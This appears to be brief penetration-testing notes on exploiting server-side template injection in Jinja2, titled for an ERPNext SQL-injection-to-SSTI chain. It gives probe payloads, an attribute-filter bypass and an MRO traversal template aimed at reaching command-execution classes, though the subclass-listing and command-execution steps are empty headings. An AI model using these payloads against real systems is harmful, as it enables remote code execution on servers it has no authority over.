ERPNext (SQLi -> SSTI)
SSTI Exploitation Checklist (Jinja2)
1. Confirm SSTI
Inject {{7*7}} or {{1337}} and check whether the expression is evaluated. Try {% set var = "test" %} to test logic blocks.

2. Bypass Filters
Use |attr() to access attributes dynamically. Example:
{{ "ssti"|attr("__class__") }}

3. Access MRO (Method Resolution Order)
{% set string = "ssti" %}
{% set class = "__class__" %}
{% set mro = "__mro__" %}
{% set mro_r = string|attr(class)|attr(mro) %}
{{ mro_r[1] }}

4. List Subclasses

5. Identify Useful Classes
Look for subprocess.Popen, os.system, etc. Use indexing to access a specific class:

6. Execute Commands

7. Clean Output
Use VS Code or a script to format the subclass output. Replace ", " with newlines for easier indexing.